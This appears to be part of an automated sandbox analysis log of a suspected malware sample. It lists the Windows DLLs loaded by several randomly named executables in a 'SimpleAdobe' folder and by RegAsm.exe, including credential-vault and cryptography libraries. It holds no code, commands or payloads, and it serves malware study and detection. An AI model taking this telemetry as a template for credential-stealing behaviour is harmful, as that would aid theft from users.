Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: shfolder.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: wldp.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: profapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: sspicli.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: d3d11.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: dxgi.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: dxcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: winhttp.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: wininet.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: mswsock.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: devobj.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: webio.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: winnsi.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: schannel.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: msasn1.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe Section loaded: gpapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: userenv.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: propsys.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: oleacc.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: version.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: shfolder.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: wldp.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: profapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: riched20.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: usp10.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: msls31.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: wintypes.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: wintypes.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: wintypes.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: textshaping.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: edputil.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: urlmon.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: iertutil.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: srvcli.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: netutils.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: sspicli.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: appresolver.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: slc.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: sppc.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Documents\SimpleAdobe\njeL_S54LMD1B6b6sdXBUgG6.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\njeL_S54LMD1B6b6sdXBUgG6.exe Section loaded: msimg32.dll
Source: C:\Users\user\Documents\SimpleAdobe\0kNDw1qtthM70owdcV01L1ro.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\0kNDw1qtthM70owdcV01L1ro.exe Section loaded: msimg32.dll
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe Section loaded: mswsock.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe Section loaded: wldp.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe Section loaded: propsys.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe Section loaded: profapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe Section loaded: linkinfo.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe Section loaded: ntshrui.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe Section loaded: sspicli.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe Section loaded: srvcli.dll
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe Section loaded: cscapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: d3d11.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: dxgi.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: dxcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: winhttp.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: wininet.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: mswsock.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: devobj.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: webio.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: winnsi.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: sspicli.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: schannel.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: msasn1.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: gpapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: vaultcli.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: wintypes.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: wldp.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: dpapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: iertutil.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: profapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: urlmon.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: srvcli.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: netutils.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: propsys.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: edputil.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: wintypes.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: appresolver.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: slc.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: userenv.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: sppc.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msisip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wshext.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appxsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: opcservices.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: esdsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: scrrun.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: linkinfo.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp Section loaded: uxtheme.dll
